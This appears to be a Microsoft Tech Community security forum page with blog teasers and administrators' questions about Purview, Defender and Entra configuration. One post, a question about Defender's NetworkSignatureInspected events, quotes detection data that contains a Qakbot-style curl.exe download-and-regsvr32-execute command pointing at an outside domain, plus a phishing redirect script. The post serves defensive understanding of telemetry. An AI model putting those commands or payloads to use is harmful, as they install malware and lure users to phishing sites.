Security and AI Essentials
Protect your organization with AI-powered, end-to-end security.
Defend Against Threats
Get ahead of threat actors with integrated solutions.
Secure All Your Clouds
Protection from code to runtime.
Secure All Access
Secure access for any identity, anywhere, to any resource.
Protect Your Data
Comprehensive data security across your entire estate.
Recent Blogs
6 MIN READ
Microsoft Defender Monthly news - December 2025 Edition
This is our monthly "What's new" blog post, summarizing product updates and various new assets we released over the past month across our De...
Dec 04, 2025185Views
0likes
0Comments
5 MIN READ
Most DIY security data lakes start with good intentions—promising flexibility, control, and cost savings. But in reality, they lead to endless data ingestion fixes, schema drift battles, and soaring ...
Dec 03, 2025203Views
0likes
0Comments
22 MIN READ
I will start this blog post by thanking my Secure AI GBB Colleague Hiten Sharma for his contributions to this Tech Blog as a peer-reviewer.
Microsoft Defender for AI (part of Microsoft Defender) he...
Dec 03, 2025525Views
1like
0Comments
We have reviewed the new settings in Microsoft Edge version 143 and determined that there are no additional security settings that require enforcement. The Microsoft Edge version 139 security baselin...
Dec 03, 2025185Views
0likes
1Comment
Recent Discussions
Cross-Tenant Purview Scan of Fabric Lakehouse fails to ingest Sub-items (Delta Tables)
Environment: Tenant 1 (Consumer): Azure Purview (Microsoft Purview Data Map). Tenant 2 (Provider): Microsoft Fabric (Capacity + Workspaces). Architecture: Purview in Tenant 1 is scanning Fabric in Tenant 2 via the "Fabric" Data Source using Azure Auto-Resolve Integration Runtime. The Issue: I can successfully scan and see Item-level metadata (e.g., Workspace Name, Lakehouse Name). However, I am getting Zero sub-item visibility. No Delta Tables, no Columns, and no sub-item lineage are being ingested into Purview. Configuration Verified: Service Principal (SPN): Created an App Registration in Tenant 2 (Fabric Tenant). Permissions: The SPN is a Member (and I tested Admin) of the target Fabric Workspace. Fabric Admin Settings (Tenant 2): Allow service principals to use read-only admin APIs: Enabled for the SPN's Security Group. Enhance admin APIs responses with detailed metadata: Enabled. Enhance admin APIs responses with DAX and mashup expressions: Enabled. My Specific Questions for the Product Team / MVPs/Members: Authentication Flow: For sub-item ingestion (Delta Tables) to work cross-tenant, is it sufficient for the SPN to be a standard App Registration in Tenant 2 (Provider), or does Fabric require the "Cross-Tenant Access" (Guest User) flow where a shadow SPN is created via the specific trusted external tenants configuration? API Limitation: Is the "Enhanced Metadata" API payload (metadata/subartifacts) restricted to Same-Tenant calls only during the current Preview? I suspect the API is returning a standard payload instead of the enhanced one due to the cross-tenant boundary. Workaround: Has anyone successfully forced ingestion of Delta Tables cross-tenant by using the Apache Atlas REST API to manually inject the schema entities, or is there a specific hidden toggle in the Fabric Admin Portal (perhaps specifically for "External Principals") that I am missing?Workaround Enabling Purview Data Quality & Profiling for Cross-Tenant Microsoft Fabric Assets
The Challenge: Cross-Tenant Data Quality Blockers Like many of you, I have been managing a complex architecture where Microsoft Purview sits in Tenant A and Microsoft Fabric resides in Tenant B. While we can achieve basic metadata scanning (with some configuration), I hit a hard wall when trying to enable Data Quality (DQ) scanning. Purview's native Data Quality scan for Fabric currently faces limitations in cross-tenant scenarios, preventing us from running Profiling or applying DQ Rules directly on the remote Delta tables. The Experiment: "Governance Staging" Architecture rather than waiting for a native API fix, I conducted an experiment to bridge this gap using a "Data Staging" approach. The goal was to bring the data's "physicality" into the same tenant as Purview to unlock the full DQ engine. The Solution Steps: Data Movement (Tenant B to Tenant A): Inside the Fabric Workspace (Tenant B), I created a Fabric Data Pipeline. I used this to export the critical Delta Tables as Parquet files to an ADLS Gen2 account located in Tenant A (the same tenant as Purview). Note: You can schedule this to run daily to keep the "Governance Copy" fresh. Native Scanning (Tenant A): I registered this ADLS Gen2 account as a source in Purview. Because both Purview and the ADLS account are in the same tenant, the scan was seamless, instantaneous, and required no complex authentication hurdles. Activating Data Quality: Once the Parquet files were scanned, I attached these assets to a Data Product in the Purview Data Governance portal. The Results: The results were immediate and successful. Because the data now resides on a fully supported, same-tenant ADLS Gen2 surface: ✅ Data Profiling: I could instantly see column statistics, null distributions, and value patterns. ✅ DQ Rules: I was able to apply custom logic and business rules to the data. ✅ Scans: The DQ scan ran successfully, generating a Data Quality Score for our Fabric data. Conclusion: While we await native cross-tenant "Live View" support for DQ in Fabric, this workaround works today. It allows you to leverage the full power of Microsoft Purview's Data Quality engine immediately. If you are blocked by tenant boundaries, I highly recommend setting up a lightweight "Governance Staging" container in your primary tenant. Has anyone else experimented with similar staging patterns for Governance? Let's discuss below.SolvedPurview Unified Catalogue Gov Domains Numeric Prefixing
Has Anyone Tried Numeric Prefixing for Governance Domains in Purview? Context: We introduced a structured numeric prefixing system for governance domains in Microsoft Purview to make hierarchical sorting more intuitive. What we did: Parent domains use a base prefix ending in .00 (e.g., 02.00 Group). Child domains are numbered sequentially (e.g., 02.01 Directorate, 02.01.01 Team). Why: Purview sorts domains alphabetically, which caused child domains (e.g., 02.01) to appear above their parent (02 Group). Adding .00 ensures parents always sort before children, creating a clear hierarchy. How it works: All already have 01.00- Top-level groups: 02.00 Directorates: 02.01, 02.02 Teams/Units: 02.01.01 This approach guarantees correct sorting, clear hierarchy, and scalability for future additions? Question for the community: Has anyone else implemented a similar numeric prefixing approach in Purview? Do you think this is a good idea for maintaining clarity and scalability? Any alternative strategies you’ve found effective?Application filter in the activity explorer no longer populated correctly?
To distinguish between discovery findings in a setup that has both endpoint DLP and the Information Protection Scanner deployed, typically the "Application" filter in the activity explorer is used: It seems that recently the filter behavior changed and the list of applications the filter can use is built incorrectly. 'Microsoft Purview Information Protection Scanner' is no longer listed although documents with that property are present: The filter options are typically populated by the properties from documents within range and I have verified documents discovered by the MIP scanner exist: I am wondering if more people are seeing this and if a possible workaround is available.TLS 1.1 is set as a recommended value in the latest security baseline
In the latest security baseline for Windows 11 24H2, the following item is set to "Use TLS 1.1 and TLS 1.2," but could you please explain the reason for this? Download Microsoft Security Compliance Toolkit 1.0 from Official Microsoft Download Center Windows Components\Internet Explorer\Internet Control Panel\Advanced Page Turn off encryption support Enabled: Use TLS 1.1 and TLS 1.2 Generally, I believe TLS 1.1 should no longer be used, and that using "TLS 1.2 and TLS 1.3" would be better from a security standpoint.46Views3likes1CommentBitdefender active mode , configure MDE passive mode
Hi We have scenario where client currently has Bitdefender in Active Mode and uses it to manage their endpoints and now plans to use Defender for Endpoint in Passive Mode for Endpoints (Windows 11/Server) How to configure MDE in passive mode step by step I have 500 devices how to onboard that on MDE step by step in co-management While MDE in Passive mode any performance issue along with 3rd party antivirus solutionDisable Defender for Cloud Apps alerts
Hi all, we just enabled Defender for Cloud Apps in our environment (about 500 clients). We started with setting about 300 apps to "Unsanctioned". Now we get flooded with alerts. Mainly "Connection to a custom network indicator on one endpoint" and "Multi-stage incident on multiple endpoints" when an URL is blocked on more clients. Is there a possibility to disable the alerts for this kind of blocks? I tried creating a supression rules, but didnt manage to get it working. Dont know if it is not possible or if I made a mistake. As the Defender for Cloud Apps just creates a Indicator for every app i want to block I could click every single Indicator and disable the alert there. But thats a few hundred Indicators and we plan to extend the usage. Can I centrally disable alerts for custom indicators? Thanks & Cheers3.8KViews0likes6CommentsMigrating DLP Policies from one tenant to other
Has anyone successfully migrated DLP policies from a dev tenant (like contoso.onmicrosoft.com) to a production tenant (paid license with custom domain) in Microsoft Purview without third-party tools? We're open to using PowerShell, Power Automate, or other Microsoft technologies—such as exporting policies via PowerShell cmdlets from the source tenant, then importing/recreating them in the target tenant using the Microsoft Purview compliance portal or Security & Compliance PowerShell module. Details: The dev tenant has several active DLP policies across Exchange, Teams, and endpoints that we need to replicate exactly in prod, including sensitive info types, actions, and conditions. Is there a built-in export/import feature, a sample script, or Power Automate flow for cross-tenant migration? Any gotchas with licensing or tenant-specific configs?How to apply sensitivity labels to external emails received in my Outlook?
I have created a sensitivity label and an auto-labeling policy that applies the label when an email contains sensitive information. When an internal user sends the email, the label is applied correctly. But when I receive an email with sensitive information from an external user, the label is not applied. How can I apply the sensitivity label to emails that come from external users?MDE use of Certificate based IoC not working
I have been trying to use MDE IoC with certificates as per the following link: https://learn.microsoft.com/en-us/defender-endpoint/indicator-certificates#create-an-indicator-for-certificates-from-the-settings-page This is on a demo tenant with full M365 E5 licenses and vulnerability trial enabled just in case. Test devices are: windows 11 with latest updates - domain joined and managed by Intune MDE onboarded and active with AV Network protection in block mode Cloud delivered protection enabled File hash enabled In defender portal - settings - endpoints advanced settings - all options enabled I am testing with Firefox - the installer and the application .exe after installation. I have extracted the leaf certificate from both these .exe's using the helpful information in the following link: https://www.linkedin.com/pulse/microsoft-defender-missing-manual-how-actually-create-adair-collins-paiye/ Then uploaded the certs into defender portal - settings - endpoints - IoC - certificates - set to Block and remediate Issue: Its been 24h and nothing happens on the client devices. In the defender portal - assets - devices - device timeline - I can see the firefox processes but at no point is the installer or application blocked. Have I miss understood how the feature works? Has anyone else managed to get this to work? Advice appreciated. Thanks WarrenCustomized Oversharing Dialog not working for Exchange DLP
Hi Team, When I'm enabling policy tip as a dialog for custom content. This is not working. I'm testing this option on new outlook. and this is my JSON file { "LocalizationData": [ { "Language": "en-us", "Title": "Add a title", "Body": "Add the body", "Options": [ "I have a business justification", "This message doesn't contain sensitive information", "Business justification" ] } ], "HasFreeTextOption": "true", "DefaultLanguage": "en-us" } For old outlook it's not working there too. No policy tips, no override option My old outlook versionDynamic group membership rules stopped working
We've been using the following the following dynamic membership rule to check if a user is a member of another group: user.memberOf -any (group.objectId -in ['2b930be6-f46a-4a70-b1b5-3e4e0c483fbf']) The group is an Active Directory group that is represented in Entra with the stated Entra group object Id. The validation fails for every user and looks like this: It seems that all out dynamic groups are affected and stopped working. Have you seen this before? Thanks.Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment
Reformatted Discussion for Community Feedback Recommended Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment I’m seeking guidance on whether the following set of Microsoft Purview roles is appropriate for typical data consumers within a Data Mesh-aligned organisation. The approach aims to support data democratisation while maintaining least-privilege access. Data consumers (All users) would be placed into a dedicated security group assigned to these roles, ensuring they have the best possible search experience across the Microsoft Purview Unified Catalogue, Data Map, and Data Health features. Unified Catalog Settings Global Catalog Reader Provides read-only visibility of all catalogued assets across the organisation. This role supports governance, compliance, and data discovery without granting modification rights. Using Global Catalog Reader simplifies onboarding and improves usability by giving users a consistent view of published business concepts and data products across all governance domains. Without it, visibility must be managed domain by domain through roles such as Governance Domain Reader or Local Catalog Reader, which increases administrative effort and limits discoverability. Sensitive domains can still apply additional scoped roles where required. Data Health Reader Allows users to view data health metrics such as completeness, freshness, and anomaly indicators. This supports data stewards, quality teams, and analysts in monitoring reliability without the ability to change data or rules. Unified Catalog Governance Domain Roles Data Quality Reader Provides insight into data quality rules and results within a governance domain. Useful for users who need to understand quality issues or compliance status without editing capabilities. Data Profile Reader (Conditional) Enables access to profiling information such as distributions, null counts, and detected patterns. However, profiling data may reveal sensitive information, so this role is best reserved for trusted analysts or stewards rather than being broadly granted to all data consumers. Data Map Role Assignments Data Reader Grants read-only access to metadata and lineage across the data map. This transparency is important for impact assessments, understanding dependencies, and supporting governance processes. Insights Reader Provides access to Purview Insights dashboards, including usage statistics, scanning activity, and classification trends. This role is typically valuable for managers or governance leads monitoring adoption and compliance. Summary Together, these roles aim to give data consumers the access they need for discovery, quality awareness, and understanding lineage; without exposing sensitive data or granting any capability to modify assets. The intention is to follow least-privilege practice while enabling meaningful self-service analytics.45Views0likes2CommentsNetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.Auto-Label Simulation does not simulate your rules exactly
When you’re building an auto-labeling rule and run a simulation, don’t expect it to fully follow your rule. Let me explain. It doesn’t evaluate everything. For example, if your rule says a document must match at least four regex patterns to count as a positive find, the simulation might treat a single match as a positive. Yeah, that’s frustrating. Here’s what works better: Build your Sensitive Information Type (SIT) and test it against individual documents first. Then create a policy that targets a small subset of data. Run the simulation, then turn on the policy. Check the results in Activity Explorer, which shows real production activity. Why can’t the simulation just run the full rule? Good question—we all wish it did.79Views0likes1CommentHow to stop incidents merging under new incident (MultiStage) in defender.
Dear All We are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal where multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named "Multistage." This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic. Key concerns include: Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value. Analytic rules arising from different data sources and detection logic are merged, although they represent distinct security events needing separate attention. Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement. We understand that Defender’s incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors but would like guidance or configuration best practices to disable or minimize this automatic merging behavior for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable. Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated. Thank you for your assistance. Best regardsDSPM for AI Data Risk Assessment Question
Hello everyone, my team is creating a POC for DSPM for AI in order to be ready for actual implementations. We have encountered some unexpected issues that we have found no conclusive answers to in the official articles. Everything that follows is related to the Data Risk Assessment feature that comes with DSPM for AI and its sharepoint site scanning features. First of all, does the assessment feature use both built-in and custom SITs? If this is the case, we need to take into account any custom data types in an actual implementation. Secondly, we have noticed that no assessment type (including the default one) reads all the sites found in the sharepoint admin center. We have noticed that one of them is probably the root site as its format is https://<domain name>/ while every other site looks like https://<domain name>/sites/<site name>, another one was most likely created by an application and there are some that do not appear in the list but do appear in the assessment results. All of these sites except the "root" seem to be up and running, although some show the "request access" page when opening. Third, we have not found a conclusive answer as to what is the difference between the site and item level scan. This is because, item level scan finds and scans even less sites. The configuration is as follows: Default Assessment: All users, All sites (default option) -> Finds 17/19 sites and items scanned do not match the number of items reported to be on the sites in the sharepoint admin center. The issue is that the number of reported unscanned items is 0. Site Level Assessment: All users, All sites (default option) -> Finds 11/19 sites and items scanned do not match the number of items reported to be on the sites in the sharepoint admin center. The issue is that the number of reported unscanned items is 0. Item Level Assessment: All users, No All Sites option. Finds 8/19 sites ->Scans 4/19 sites and items scanned do not match the number of items reported to be on the sites in the sharepoint admin center. The issue is that the number of reported unscanned items is 0. To sum this up, my team's questions are the following: Does this solution use custom SITs in addition to built-in ones? What extra configuration is required to scan ALL sharepoint sites for sensitive info using the Data Risk Assessments? What added value does the Item Level scan provide? Is any extra configuration besides the enterprise app creation required for Item Level scanning on all sites Thank you all in advance!Add Privacy Scrub Service to Microsoft Defender?
Microsoft Defender protects accounts against phishing and malware, but attackers increasingly exploit nuisance data broker sites that publish personal information (names, emails, addresses). These sites are scraped to personalize phishing campaigns, making them harder to detect. I propose a premium Defender add‑on that automatically files opt‑out requests with major data brokers (similar to DeleteMe).What are the prerequisites to see Microsoft Secure Score?
My teammate says that even Basic or Standard M365 license provides Secure Score. Which is kind of right as you can see a basic score when opening a tenant in Lighthouse. But if you try to go to Defender console and then Exposure menu and press on Secure Score, it won't load with just Standard/Basic licenses assigned to users. I have tried to find a definitive list, but i can't. Copilot said you need at least Premium Business or E3/E5 or Defender P1. Which seems to make sense. But i need a confirmation. And also why do i see some score on tenant's page in Lighthouse?